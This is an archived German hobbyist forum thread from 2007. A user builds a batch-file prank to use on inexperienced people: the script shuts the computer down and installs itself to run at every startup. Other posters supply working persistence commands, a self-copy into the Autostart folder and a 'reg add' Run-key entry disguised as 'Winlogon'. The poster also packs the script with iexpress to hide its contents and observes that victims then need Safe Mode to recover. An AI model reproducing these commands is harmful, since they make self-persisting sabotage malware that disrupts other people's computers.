PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [Batch] Befehl zum registry hinzufügen



Sniper Demon
12.03.2007, 18:35
Also...
Ich mach grad was ganz simples, aber effektives (bei Noobs zumindest^^)...
Zurzeit sieht meine Batch so aus:



@echo off
shutdown -s

Nun kenn ich den Befehl nicht wie ich das Batch Script das den PC runterfährt in den Autostart (HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\) bekommen soll...
Ich kenn zwar den Befehl


reg add


Aber ich weiß nicht was ich da hinmachen soll...
Die .bat heißt jetzt grade test.bat wenn ich nun sowas mach:



@echo off
add reg HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\test.bat


Dann erstellt der einen Unterordner von "Run" mit dem Namen "test.bat" also sowas: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\test.bat"

Naja...also kennt einer den richtigen Befehl?

-=Player=-
13.03.2007, 10:39
wenn du meinst, das es für noobs ist, dann kannst du ja die bat datei in den autostart ordner kopieren der in start>programm ist...
sollte auch funktionieren.

Sniper Demon
13.03.2007, 14:25
wenn du meinst, das es für noobs ist, dann kannst du ja die bat datei in den autostart ordner kopieren der in start>programm ist...
sollte auch funktionieren.

Ja stimmt....Bin ich garnicht draufgekommen...
Teste ich mal gleich :)

Edit: Jetzt ist mir aufgefallen das ich ja den Pfad angeben muss zu der Batch und zu dem Autostart Ordner.
Jeder hat ja einen anderen Benutzernamen und jeder speichert die Datei woanders deswegen kann ich den Pfad nicht bestimmen...
Bei dem Autostart Ordner genauso der Pfad ist ja X:\Dokumente und Einstellungen\USERNAME\Autostart

Also wenn jemand einen Befehl kennt um die Batch in "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\" hinzuzufügen dann her damit :D

Sniper Demon
05.04.2007, 13:35
Das Funktioniert irgendwie nicht...
Ich hab es so versucht:

@echo D
xcopy %0 %windir%\System32\sys.bat /Y
shutdown -s -t 20

Hat sich nicht automatisch neugestartet und dann nochmal so:

@echo D
xcopy %0 %windir%\System32\sys.bat /Y
@echo F
xcopy %0 %windir%\System32\sys.bat /Y
shutdown -s -t 20


Hat sich auch nicht automatisch wieder gestartet...Oder hab ich dich falsch verstaden und du meintest was anderes?

Edit: Kennst du (oder ein anderer) auch den Ordnernamen für Autostart, also den Namen wie bei %windir% nur halt für den Autostart Ordner?

Sph1nX
05.04.2007, 13:39
Möglichkeit 1
copy %0 "%userprofile%\startm~1\Programme\Autostart\Command .bat"

Möglichkeit 2
copy %0 "%windir%\Command\Command.bat"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d %windir%\Command\Command.bat /f

Sniper Demon
05.04.2007, 14:05
2. Möglichkeit hat nicht geklappt, die erste aber schon :D :mrgreen: :mrgreen:


MfG Sniper Demon

Edit: Wenn ich das jetzt mit iexpress packe, damit man nicht einfach rechter mausklick > Bearbeiten machen kann, dann geht das nicht mehr das sich die command.exe automatisch startet...
Also ich hab das gepackte in command.exe umbenannt und die batch so geändert:

copy %0 "%userprofile%\startm~1\Programme\Autostart\Command .EXE"
shutdown -s -t 20

wenn ich es so lasse:

copy %0 "%userprofile%\startm~1\Programme\Autostart\Command .bat"
shutdown -s -t 20

geht es auch nicht......Also es kopiert sich garnicht in den Autostart Ordner....

Sniper Demon
05.04.2007, 18:19
Wenn ich den Timer weglass schaft der das, aber garnicht^^
Dann muss der in den Abgesicherten Modus und das da rausmachen... :P